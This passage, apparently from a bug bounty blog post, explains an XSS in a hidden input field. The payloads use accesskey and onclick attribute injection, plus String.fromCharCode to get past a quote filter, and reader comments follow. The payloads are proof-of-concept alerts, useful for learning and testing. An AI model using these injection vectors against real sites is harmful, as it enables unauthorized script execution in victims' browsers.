…where you have the input sanitized for ‘<> chars.
I come across a web application on a bounty program where the returnurl was placed in the following HTML:
[code language=”html”]<input type="hidden" name="returnurl" value="[USER INJECT]" />[/code]
The security filter removed <>’ chars but kept the double quote active and reflected.
What’s the first thing that comes to mind?
[code language=”html”]http://victim/?returnurl=" onclick="prompt(1)[/code]
Oh no! Wait… This is a hidden field so most Javascript events can’t work because you can’t see the input box right?
Also you can’t style it to show the field.
What I did was quite simple. I remember that Gareth Heyes wrote a small article on PortSwigger where you can use accesskey to get the XSS working. You press a key on your keyboard and you call a Javascript event. So my injection become:
[code language=”html”]http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)[/code]
Which reflected:
[code language=”html”]<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />[/code]
If the victim uses the accesskey X [usually by using ALT+SHIFT+X – Windows or CTRL+ALT+X in OSX] it will get the domain reflected in the javascript alert box. Keep in mind that this works only at Firefox.
To give a better report and also to bypass their single quote I also sent the following XSS vector:
[code language=”html”]http://victim/?returnurl=" accesskey="X" onclick="alert(String.fromCharCode(39,89,111,117,32,103,111,116,32,88,83,83,101,100,33,39))[/code]
It requires more user interaction but might give the bug appreciation program the Woooo! Factor 🙂
What would you do if double quotes are filtered ?
” become "
‘ become '
Hi
In which browser this XSS can be inserted, I tried with firefox 4, IE 11, chrome but not able to achieve the same
Firefox and it still works.